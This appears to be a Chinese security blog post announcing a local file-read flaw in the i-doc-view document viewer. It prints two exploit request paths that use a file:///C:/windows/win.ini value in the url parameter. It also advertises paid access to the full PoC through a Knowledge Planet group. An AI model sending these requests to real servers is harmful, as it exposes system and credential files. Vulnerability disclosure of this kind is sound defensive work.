i-doc-view url 文件读取漏洞,攻击者可构造恶意请求获取系统信息等及其它安全风险。
受影响URL:
/view/url?url=file:///C:/windows/win.ini
/view/{{key}}.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi
简述:i-doc-view url 文件读取漏洞,攻击者可构造恶意请求获取系统信息,造成数据系统及其它安全风险。
nuclei脚本
POC细节发布在知识星球
专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖。
(星球内部分工具脚本截图)
星球活跃度
精选主题一
精选主题二
精选主题三
精选主题四
精选主题五
马赛克安全实验室专注于:漏洞复现、渗透测试、nday、0day、网络安全、红蓝对抗,持续输出安全相关漏洞情报、漏洞复现相关漏洞验证脚本及工具。
工具列表(点击可直接查看)
漏洞分析列表(点击可直接查看)
复现列表(点击可直接查看)
/view/url?url=file:///C:/windows/win.ini
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...